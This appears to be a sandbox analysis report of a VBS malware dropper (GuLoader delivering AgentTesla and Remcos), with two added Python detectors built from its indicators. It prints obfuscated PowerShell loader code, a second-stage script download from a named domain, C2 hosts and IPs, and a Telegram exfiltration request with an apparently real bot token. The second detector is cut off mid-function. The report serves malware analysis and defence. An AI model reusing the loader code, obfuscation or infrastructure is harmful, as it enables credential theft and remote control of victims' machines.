Windows Analysis Report
IMG_2022028022-0120.vbs

Overview

General Information

Sample Name: IMG_2022028022-0120.vbs
Analysis ID: 755530
MD5: 752418aa9de96e0fc941ae1e7e33c906
SHA1: bb67df2d8a4b525b42211630386e4b51a97255a3
SHA256: cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf

Detection

AgentTesla, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 6472 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 6492 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • ieinstal.exe (PID: 1796 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
          • wscript.exe (PID: 2468 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
            • powershell.exe (PID: 4508 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted; report truncated here]
Un'No9Pe2St9FlAGeBIm0PuBStAbeBBeDTrACoCTrASe4ReESa7Sa9SpBmoBGlCEfASa7TfBDuDKoAAf0miASc4TiAofCMoEOr7Pa8Ig0NoALe7FiBTuDDeAJaCBoBChBMaAFi6GrBPr9Ch9SwAJeAImCHaBSaBOrBGrFFoAPr0KnASiAPrAHaCudBGeAVeEEl7Ed8Cl4biAFr8NeBOdBRaBDeAGlACr1TrAGa8PsAPa5Gi9Ze4NoFBl3auFFo3Mo8KiAorAAf6NeBKr9TaBDy0TiEUd1DiENiDbr8Ga8KaAPaDBhBEnASkATyABgBVeBuoAAb0AbBDo9FoBSyDDiARe0BaBBoDWaAst0VuBSuCTaBTyAImEFo5skEFl9FeFPlAWiFInFklFKrFViENe5VaEsv9HoESuDEvASp6tiBMiBKaAKl0BaEBa5kvERi9SmESvDStBHaAChABa0CoBFl3SyACoCRmEPs0Ir'vi;No&Re(Di`$PaDUdeRamPraAvgpenAneAmtSyiSezSoaSvbSalfieDe7Ov)Sm Ko`$MusBrpDyijulDedMieovvJoaCanPhdAtsOrpFrrPaoFojNoePrkBotSoeKarHe1Bv;Ca`$AgsRopGriJulPodBreAfvRoaUdnSydChsStpFerAnoCijWeeStkAntWieRerTo2Un Ro=Sa MoHVeTFoBan la'inESaDPlBPjFMoARa8MiBUgBno9Fl6guBTjBOpBAmCAnACy7PeASy4PuAShCOpETi9CeFCo4ExEDe9Fa9Un2un9ToAPaBTe0LiBEmASaBcrDPrACuCSoAFo4HoEPo7Re9PeBzyBBoCJeAka7HoBPrDJuAAn0CuAdi4PaAgeCraEwo7Di8Fa0ReASe7StBAnDOvAGlCAfBInBObAor6UnBLy9No9KaASaAOpCDiBInBAbBTrFToATy0BeAspAFlAArCskBInAWiEBr7Ba8Yd4YaABu8UdBSkBVaBfoATeAHo1AbAFo8FaAMa5Jo9Wh4WeFMi3heFFo3Re8CrESkAInCRaBHoDGr8TaDAnAViCkrAPr5ReAEfCFiATaEAlAAp8beBprDChAHaCPe8klFUdALi6GeBStBFo8gaFSuBShCafALr7AtATrASlBBaDHaAAn0SoAbr6TyAFl7Uk9Fr9FoABr6BuAPr0PoAHe7doBDoDanAMoCCrBAfBPaECh1PaEapDPr8gr8HjBDvBAaBLoDSuASkCSfAFlFHiASv8DiADd2inBSuDMaASeCCeBhuBYdFFiAunEBr5StEVe9CiENe1Ud8PhESa8InDOr9NaDBaELi9Ko8An9UnEIn1Ka9Ce2Re8Pl0ErACr7OmBSmDhy9No9HeBIdDCoBBeBUn9Ca4veELe5Or9Ps2Be8St0CaAMa7TjBUpDBl9Ud9KaBMyDLuBArBRe9do4SyEBi0SeEGr9FrEAn1Pr9Op2Un9CiFPoAEx6MoALa0VaAVeDSp9Ch4ChEWh0ArEVa0BeEAn0En'Di;In&Ma(Li`$GeDCheEumOuaHvgLonNueUatFuiMizfjaKrbEtlOeeIn7Fo)In Ma`$FosDepGoiLalUndMieAmvWhaImnTydGesFipAnrDaoMojJaeUskOmtFaeHorso2Fi;Ou`$AnsNypOviSplTadKoeBlvReaInnSadSisOppAlrbrochjHoeStkSttmoeBerre3Pr Cu=Sa PhHFuTsiBpa 
Vo'ovEBiDHyBPuFwiASt8PeBkuBIn9Bo6VeBStBUnBKvCDiAUn7NaAGa4KoAFiCveEFa7Tr8Sm0UdAFl7HaBDeFHeATa6HyARa2EnASkCSaEEx1AdERoDMaADd6InBOpBSaANo0InEBr5TaEAdDInBHaFHaADi8AfBBaBce9No6RuASa7BuBUnDMoESu0Mu'Tr;Sw&Go(Se`$ReDHaeBemRoaPrgHenRoeSythuiLezPlaPabPjlHaeAa7No)Un ne`$ResStpHeiFulRedOteBrvHuaGonDedFesStpKvrIboDijSteFikFntReePlrSm3Ni#Bl;""";;Function spildevandsprojekter9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Brndoffers = $Brndoffers + $HS.Substring($i, 1); } $Brndoffers;}$Chlorpikrin0 = spildevandsprojekter9 'AgIPaEBeXBa ';$Chlorpikrin2 = spildevandsprojekter9 'CosLatHuaCerRytRe-RejAfoYvbRi ';$Chlorpikrin1= spildevandsprojekter9 $Damspils;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Chlorpikrin1 ;}else{&$Chlorpikrin0 $Chlorpikrin1;};;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • CasPol.exe (PID: 3788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | (none)
00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | (none)
0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | (none)
0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | (none)
0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | (none)
            No Sigma rule has matched
            Snort IDS alert: SID 2851779 (ETPRO TROJAN Agent Tesla Telegram Exfil)
            Timestamp: 11/28/22-20:47:47.307107
            Source IP: 192.168.11.20
            Source Port: 49881
            Destination IP: 149.154.167.220
            Destination Port: 443
            Protocol: TCP
            Classtype: A Network Trojan was detected


            AV Detection

            Source: Yara match | File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: sinopbisikletkiralama.com | Virustotal: Detection: 8%
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2

            Networking

            Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49881 -> 149.154.167.220:443
            Source: unknown | DNS query: name: api.telegram.org
            Source: unknown | DNS query: name: backupfrontmanny.duckdns.org
            Source: unknown | DNS query: name: myfrontmannyfive.ddns.net
            Source: Joe Sandbox View | ASN Name: WKD-ASIE
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global traffic | HTTP traffic detected: POST /bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad181ce08d6ac | Host: api.telegram.org | Content-Length: 1015 | Expect: 100-continue | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 37.0.14.209
            Source: Joe Sandbox View | IP Address: 149.154.167.220
            Source: global traffic | HTTP traffic detected: GET /Bichloride.vbs HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: sinopbisikletkiralama.com | Cache-Control: no-cache
            Source: global traffic | TCP traffic: 192.168.11.20:49814 -> 84.38.134.104:4939
            Source: global traffic | TCP traffic: 192.168.11.20:49815 -> 37.0.14.209:4939
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknown | Network traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (22 occurrences)
            Source: unknown | DNS traffic detected: queries for: sinopbisikletkiralama.com
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2
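The Networking evidence above contains four behaviours that survive a change of hostname or IP: a Telegram Bot API call (the sendDocument POST behind Snort SID 2851779), DNS for dynamic-DNS names, a download of a second-stage script file, and raw TCP sessions to an uncommon port (4939). The following is an added example written for this report, not Joe Sandbox code and not the Emerging Threats rule: it runs those checks over constructed one-line log events modelled on the lines above. The event format, the port allow-list, the dynamic-DNS suffixes beyond duckdns.org and ddns.net, and the bot token in the sample (a placeholder, not the one captured) are this example's own assumptions.

```python
"""Flag the network indicators from this report in a stream of log events.

Added example for this report; not Joe Sandbox code and not the Emerging Threats
rule. Event format (one text line per DNS query, HTTP request or TCP session) is an
assumption; adapt the parsers to your proxy/DNS/NetFlow schema.
"""
import re
from dataclasses import dataclass

# duckdns.org and ddns.net are from the report; the rest is a starter list to extend.
DDNS_SUFFIXES = ("duckdns.org", "ddns.net", "no-ip.org", "hopto.org", "dynu.net")
# Script and loader types a first stage fetches (the sample pulled /Bichloride.vbs).
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".hta", ".ps1", ".wsf")
# Ports a workstation normally talks to; 4939 (seen twice here) is not among them.
COMMON_PORTS = {25, 53, 80, 123, 139, 443, 445, 587, 993, 995, 3389}

TELEGRAM_BOT_RE = re.compile(r"^https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)", re.I)
TCP_RE = re.compile(r"^tcp (\S+):(\d+) -> (\S+):(\d+)$")


@dataclass
class Alert:
    rule: str
    severity: str
    detail: str


def redact_token(token: str) -> str:
    """Enough of a bot token to correlate across hosts, never the whole secret."""
    return token[:4] + "..." + token[-2:]


def check_dns(host: str):
    host = host.lower().rstrip(".")
    if any(host == s or host.endswith("." + s) for s in DDNS_SUFFIXES):
        return Alert("dynamic_dns", "medium", f"query for dynamic-DNS host {host}")
    return None


def check_http(method: str, url: str):
    m = TELEGRAM_BOT_RE.match(url)
    if m:
        bot_id, token, api_method = m.groups()
        return Alert("telegram_bot_api", "high",
                     f"{method} to Telegram Bot API method {api_method}; "
                     f"bot_id={bot_id} token={redact_token(token)}")
    path = url.split("?", 1)[0].lower()
    if path.endswith(SCRIPT_EXTENSIONS):
        return Alert("script_download", "high", f"{method} of script file {url}")
    return None


def check_tcp(dst: str, dport: int):
    if dport not in COMMON_PORTS:
        return Alert("raw_tcp_uncommon_port", "low", f"TCP session to {dst}:{dport}")
    return None


def analyze(events):
    """Events: 'dns <src> query <name>', 'http <src> <METHOD> <url> [ua=...]',
    'tcp <src>:<sport> -> <dst>:<dport>'. Returns one Alert per matching event."""
    alerts = []
    for line in events:
        kind, _, rest = line.partition(" ")
        alert = None
        if kind == "dns":
            alert = check_dns(rest.split()[-1])
        elif kind == "http":
            fields = rest.split()          # src, METHOD, url, optional ua=...
            alert = check_http(fields[1], fields[2])
        elif kind == "tcp":
            m = TCP_RE.match(line)
            if m:
                alert = check_tcp(m.group(3), int(m.group(4)))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample modelled on the report's Networking section. The bot token is a
# made-up placeholder, not the one in the capture.
SAMPLE_EVENTS = [
    "dns 192.168.11.20 query api.telegram.org",
    "dns 192.168.11.20 query backupfrontmanny.duckdns.org",
    "dns 192.168.11.20 query myfrontmannyfive.ddns.net",
    "dns 192.168.11.20 query sinopbisikletkiralama.com",
    "http 192.168.11.20 GET http://sinopbisikletkiralama.com/Bichloride.vbs "
    "ua=Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "http 192.168.11.20 POST https://api.telegram.org/bot1234567890:AAExampleTokenExampleTokenExampleTok/sendDocument",
    "tcp 192.168.11.20:49814 -> 84.38.134.104:4939",
    "tcp 192.168.11.20:49815 -> 37.0.14.209:4939",
    "http 192.168.11.20 GET https://www.example.com/index.html ua=Mozilla/5.0",
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"{a.severity:6} {a.rule:22} {a.detail}")
```

The Telegram check keys on the URL shape `/bot<id>:<token>/<method>` rather than on a specific token, so it keeps firing when the operator rotates bots; the extracted bot_id is the stable value to pivot on, and the token is truncated so it never lands in a ticket.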

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window created: window name: CLIPBRDWNDCLASS

            E-Banking Fraud

            Source: Yara match | File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn 
Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu 
Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: Initial file | Fusendes.ShellExecute Nske,Br0, "", "", 0
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Dropped file: Steuroperens.ShellExecute Meninger,Ma5, "", "", 0
            Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 17542
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5700
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 19424
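The process evidence in this section gives three host-side signals that do not depend on the sample's hashes: a script host (wscript.exe) starting powershell.exe with a command line of 17542 or 19424 bytes that is mostly two-letter filler, the 64-bit powershell.exe re-launching the SysWOW64 (32-bit) powershell.exe, and CasPol.exe, a .NET framework tool, starting with no arguments at all. The following is an added example written for this report, not Joe Sandbox code: it scores constructed process-creation events modelled on the tree above. The event schema, the length threshold, the filler-ratio heuristic and the parent chosen for CasPol.exe (the excerpt does not state it) are this example's own assumptions; the long command line is approximated by repeating the opening of the `$Badeanstalt` stage shown above.

```python
"""Score process-creation events for the launch chain this report documents.

Added example for this report; not Joe Sandbox code. Event schema, thresholds and
the filler-ratio heuristic are assumptions; baseline them on your own telemetry.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 4096           # chars; the report's lines are 5700, 17542 and 19424
FILLER_THRESHOLD = 0.4        # share of the line made of Capital+lowercase filler pairs

# The obfuscation in this sample puts two filler letters before every real character
# ("AgIPaEBeXBa " hides "IEX"); most fillers are a capital followed by a lowercase.
FILLER_RE = re.compile(r"[A-Z][a-z]")


@dataclass
class Alert:
    rule: str
    severity: str
    image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def filler_ratio(cmdline: str) -> float:
    """Fraction of the command line covered by Capital+lowercase pairs (~0.6 for this scheme)."""
    return 2 * len(FILLER_RE.findall(cmdline)) / len(cmdline) if cmdline else 0.0


def has_no_arguments(image: str, cmdline: str) -> bool:
    """True when the command line is only the image path (as for CasPol.exe here)."""
    return cmdline.strip().strip('"').lower() == image.lower()


def score_event(ev: dict) -> list:
    image, parent, cmd = ev["image"], ev["parent_image"], ev["command_line"]
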